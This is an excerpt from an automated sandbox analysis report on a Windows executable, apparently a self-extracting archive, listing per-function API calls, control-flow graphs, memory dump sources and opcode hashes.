                                                              • Instruction ID: 925585ad00a39d102fedd9250b3750a21f80e19b1b1e26af194e8c76d52b3c31
                                                              • Opcode Fuzzy Hash: 19dc83eb77cf9beffcd51bfbb4ed011f9f8d4ce7fa1ef560c6f5e72a66dbabc7
                                                              • Instruction Fuzzy Hash: 6C51C372600216AFFB298E64CC41EBBB7AAFB46760F154628FC14D6950DB34DC51C6A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 976 8a3b72-8a3b7c 977 8a3bee-8a3bf1 976->977 978 8a3b7e-8a3b8c 977->978 979 8a3bf3 977->979 981 8a3b8e-8a3b91 978->981 982 8a3b95-8a3bb1 LoadLibraryExW 978->982 980 8a3bf5-8a3bf9 979->980 983 8a3c09-8a3c0b 981->983 984 8a3b93 981->984 985 8a3bfa-8a3c00 982->985 986 8a3bb3-8a3bbc GetLastError 982->986 983->980 988 8a3beb 984->988 985->983 987 8a3c02-8a3c03 FreeLibrary 985->987 989 8a3bbe-8a3bd3 call 8a6088 986->989 990 8a3be6-8a3be9 986->990 987->983 988->977 989->990 993 8a3bd5-8a3be4 LoadLibraryExW 989->993 990->988 993->985 993->990
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,008A3C35,?,?,008E2088,00000000,?,008A3D60,00000004,InitializeCriticalSectionEx,008B6394,InitializeCriticalSectionEx,00000000), ref: 008A3C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: 9fb114c6e746ee8b83463fde2fa08f75d09958173846157ce8cb90582d11d610
                                                              • Instruction ID: 4dff13c717faa2ff4d1f4a1153e5eca4b615b1a2c2ffb08256f299ffc12afcf5
                                                              • Opcode Fuzzy Hash: 9fb114c6e746ee8b83463fde2fa08f75d09958173846157ce8cb90582d11d610
                                                              • Instruction Fuzzy Hash: AD11C232A45625ABEF228B689C41B5A37A5FF03770F250220F955FB6D0E774EF0186E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 994 89abab-89abca GetClassNameW 995 89abcc-89abe1 call 891fbb 994->995 996 89abf2-89abf4 994->996 1001 89abf1 995->1001 1002 89abe3-89abef FindWindowExW 995->1002 998 89abff-89ac01 996->998 999 89abf6-89abf8 996->999 999->998 1001->996 1002->1001
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0089ABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0089ABF9
                                                                • Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0089ABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: ac33a1a7dbf7e08ef2f30fe382217a58d9f7a3896e057c9905d9354866ef2bee
                                                              • Instruction ID: 096f9ba387c748e8a9c790f76da9ee27dbccc5129c50eeb6a524068500326938
                                                              • Opcode Fuzzy Hash: ac33a1a7dbf7e08ef2f30fe382217a58d9f7a3896e057c9905d9354866ef2bee
                                                              • Instruction Fuzzy Hash: D5F0E23270062976DF20B6659C09FEB726CFB82B10F4C0021BA44E7180DB60EE4185F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                                • Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              • OleInitialize.OLE32(00000000), ref: 0089AC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0089AC66
                                                              • SHGetMalloc.SHELL32(008C8438), ref: 0089AC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3So
                                                              • API String ID: 3498096277-3464455743
                                                              • Opcode ID: b0aba75358bcf16fcc69db09ae46caa0e435fbd175647fb53458c1508594df3b
                                                              • Instruction ID: 7d7b71d4241ff972b4dd8883c2f787ce4f1f7b3b2a497e97d281fe702f258552
                                                              • Opcode Fuzzy Hash: b0aba75358bcf16fcc69db09ae46caa0e435fbd175647fb53458c1508594df3b
                                                              • Instruction Fuzzy Hash: 73F0F9B1900249ABCB10AFA9D8499EFFFFCFF94700F00415AA815E2241DBB856058FA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1007 8898e0-889901 call 89ec50 1010 88990c 1007->1010 1011 889903-889906 1007->1011 1013 88990e-88991f 1010->1013 1011->1010 1012 889908-88990a 1011->1012 1012->1013 1014 889921 1013->1014 1015 889927-889931 1013->1015 1014->1015 1016 889933 1015->1016 1017 889936-889943 call 886edb 1015->1017 1016->1017 1020 88994b-88996a CreateFileW 1017->1020 1021 889945 1017->1021 1022 8899bb-8899bf 1020->1022 1023 88996c-88998e GetLastError call 88bb03 1020->1023 1021->1020 1025 8899c3-8899c6 1022->1025 1027 8899c8-8899cd 1023->1027 1029 889990-8899b3 CreateFileW GetLastError 1023->1029 1025->1027 1028 8899d9-8899de 1025->1028 1027->1028 1030 8899cf 1027->1030 1031 8899ff-889a10 1028->1031 1032 8899e0-8899e3 1028->1032 1029->1025 1036 8899b5-8899b9 1029->1036 1030->1028 1034 889a2e-889a39 1031->1034 1035 889a12-889a2a call 890602 1031->1035 1032->1031 1033 8899e5-8899f9 SetFileTime 1032->1033 1033->1031 1035->1034 1036->1025
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00887760,?,00000005,?,00000011), ref: 0088995F
                                                              • GetLastError.KERNEL32(?,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0088996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00887760,?,00000005,?), ref: 008899A2
                                                              • GetLastError.KERNEL32(?,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008899AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008899F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 11d73bbcc5f3699d89fbf459467d5e820e054965ac6725096b3ca81d32b21cd6
                                                              • Instruction ID: 043599beb7356de35ce4104307378a5f11d8a202d71070fcfe8f8f1334c30c41
                                                              • Opcode Fuzzy Hash: 11d73bbcc5f3699d89fbf459467d5e820e054965ac6725096b3ca81d32b21cd6
                                                              • Instruction Fuzzy Hash: DE312F30584745AFE720AB24CC46BAABF98FB40320F280B19F9E1D21D1D3B4A985CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1066 89b568-89b581 PeekMessageW 1067 89b5bc-89b5be 1066->1067 1068 89b583-89b597 GetMessageW 1066->1068 1069 89b599-89b5a6 IsDialogMessageW 1068->1069 1070 89b5a8-89b5b6 TranslateMessage DispatchMessageW 1068->1070 1069->1067 1069->1070 1070->1067
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                              • IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                              • TranslateMessage.USER32(?), ref: 0089B5AC
                                                              • DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: ef74eee7f7af090e2ce0d168e4d21f22bb10c51202b415578197eabfff61d5b7
                                                              • Instruction ID: cc322cc126ebca06bcd66fef720788bd3c5faa8c54d2d7063ef8aaa739a1a898
                                                              • Opcode Fuzzy Hash: ef74eee7f7af090e2ce0d168e4d21f22bb10c51202b415578197eabfff61d5b7
                                                              • Instruction Fuzzy Hash: 6CF0B771A0126AAB8F20ABE6AD8CDEB7FBCFE453917444415B919D3010EB34DA05CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1071 89dbde-89dc12 call 89ec50 SetEnvironmentVariableW call 890371 1076 89dc14-89dc18 1071->1076 1077 89dc36-89dc38 1071->1077 1078 89dc21-89dc28 call 89048d 1076->1078 1081 89dc1a-89dc20 1078->1081 1082 89dc2a-89dc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0089DBF4
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0089DC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: b322d1f528fa1bdd5a5fbecc991afe898af12a22f842629bc77ebcace4aca069
                                                              • Instruction ID: b54f7d9614c3806904d8f5839c9438921c0a97664209929a4018ce4f69f76276
                                                              • Opcode Fuzzy Hash: b322d1f528fa1bdd5a5fbecc991afe898af12a22f842629bc77ebcace4aca069
                                                              • Instruction Fuzzy Hash: 68F0E5B2404328ABCF213F9CDC06BFA7B5CFF14B89B080411BD85E6351E6B48940EAB5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1083 889785-889791 1084 88979e-8897b5 ReadFile 1083->1084 1085 889793-88979b GetStdHandle 1083->1085 1086 889811 1084->1086 1087 8897b7-8897c0 call 8898bc 1084->1087 1085->1084 1088 889814-889817 1086->1088 1091 8897d9-8897dd 1087->1091 1092 8897c2-8897ca 1087->1092 1094 8897ee-8897f2 1091->1094 1095 8897df-8897e8 GetLastError 1091->1095 1092->1091 1093 8897cc 1092->1093 1098 8897cd-8897d7 call 889785 1093->1098 1096 88980c-88980f 1094->1096 1097 8897f4-8897fc 1094->1097 1095->1094 1099 8897ea-8897ec 1095->1099 1096->1088 1097->1096 1100 8897fe-889807 GetLastError 1097->1100 1098->1088 1099->1088 1100->1096 1102 889809-88980a 1100->1102 1102->1098
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00889795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008897AD
                                                              • GetLastError.KERNEL32 ref: 008897DF
                                                              • GetLastError.KERNEL32 ref: 008897FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: b7ee1e0c216c3300616a024a73217ea08dfb53aecc5939f7e828fb11e13b2b95
                                                              • Instruction ID: f697708b068375b4dd5e4ea33af894ee40d253dd81eed2d1bcab9266791034a6
                                                              • Opcode Fuzzy Hash: b7ee1e0c216c3300616a024a73217ea08dfb53aecc5939f7e828fb11e13b2b95
                                                              • Instruction Fuzzy Hash: 81118E30914609EBDF207F64CC04A7937A9FF42724F188A39F496C5190E7749E44DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0088D710,00000000,00000000,?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue), ref: 008AAD66
                                                              • GetLastError.KERNEL32(?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue,008B7970,FlsSetValue,00000000,00000364,?,008A98B7), ref: 008AAD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue,008B7970,FlsSetValue,00000000), ref: 008AAD80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 70345552d086edff0f85835e34ad87f5f7c53989bf2c0b194b9891d475a1b341
                                                              • Instruction ID: e89af49b64ed266961fce1d85a9f54dd8267541e0d27801d6cfebe281fe8ab7a
                                                              • Opcode Fuzzy Hash: 70345552d086edff0f85835e34ad87f5f7c53989bf2c0b194b9891d475a1b341
                                                              • Instruction Fuzzy Hash: 54012B36201736AFD7264B68DC44A577B98FF467A37110720F946E7D60D721D801C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0088D343,00000001,?,?,?,00000000,0089551D,?,?,?), ref: 00889F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0089551D,?,?,?,?,?,00894FC7,?), ref: 00889FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0088D343,00000001,?,?), ref: 0088A011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              • Opcode ID: d260612fe692cd0d7646cdfa2afa679bf97227b8daf25a4670466b607d0be01d
                                                              • Instruction ID: 812ebaef0ef73039ffd4abcc097ebbd19961762dabe1fed5ed851632cd6a6d0d
                                                              • Opcode Fuzzy Hash: d260612fe692cd0d7646cdfa2afa679bf97227b8daf25a4670466b607d0be01d
                                                              • Instruction Fuzzy Hash: EB319E31208309EFEB18AF24D918B7A77A5FF84715F044619F981DB2D0CB75AD48CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088C27E: _wcslen.LIBCMT ref: 0088C284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A30C
                                                              • GetLastError.KERNEL32(?,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: b7730b2fa87c4deace6cac091c1bedf650171ea923d3b2d3e7328e5feb6e95e0
                                                              • Instruction ID: 2a916257ade260f191b4bfef4dfde01c1730f31bf7ca696912a3618d348469fc
                                                              • Opcode Fuzzy Hash: b7730b2fa87c4deace6cac091c1bedf650171ea923d3b2d3e7328e5feb6e95e0
                                                              • Instruction Fuzzy Hash: CF01B131200614AAFF2ABB794C09BFE3748FF0A781F044416F901E62D1DB64CA8287B7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008AB8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 76fefa7034c1f56ae8c73301693d633136dc2f301fd3c35d43ad85eec665d41e
                                                              • Instruction ID: 1136613ac13d9d0d8bc18e409cf183c70c14a53a0ef17629956bbcef23178195
                                                              • Opcode Fuzzy Hash: 76fefa7034c1f56ae8c73301693d633136dc2f301fd3c35d43ad85eec665d41e
                                                              • Instruction Fuzzy Hash: A241FB7050425C9EEB218E28CC84BF7BBA9FB46308F1804EDD59AC6543E335AA45CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 008AAFDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: 9ecfbb5c0b00ee5c1c5cd54c8547fe08ae4b5911955c7dcf515ee5ff55a222e7
                                                              • Instruction ID: 656462f013d48cb08252272f53a5bead824e93a9521c6dbfe1eae595d8ab7c8d
                                                              • Opcode Fuzzy Hash: 9ecfbb5c0b00ee5c1c5cd54c8547fe08ae4b5911955c7dcf515ee5ff55a222e7
                                                              • Instruction Fuzzy Hash: 79012932504209BBDF165FA0DC05DEE7F62FF49750F054254FE24A5260CB368A31EB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008AA56F), ref: 008AAF55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
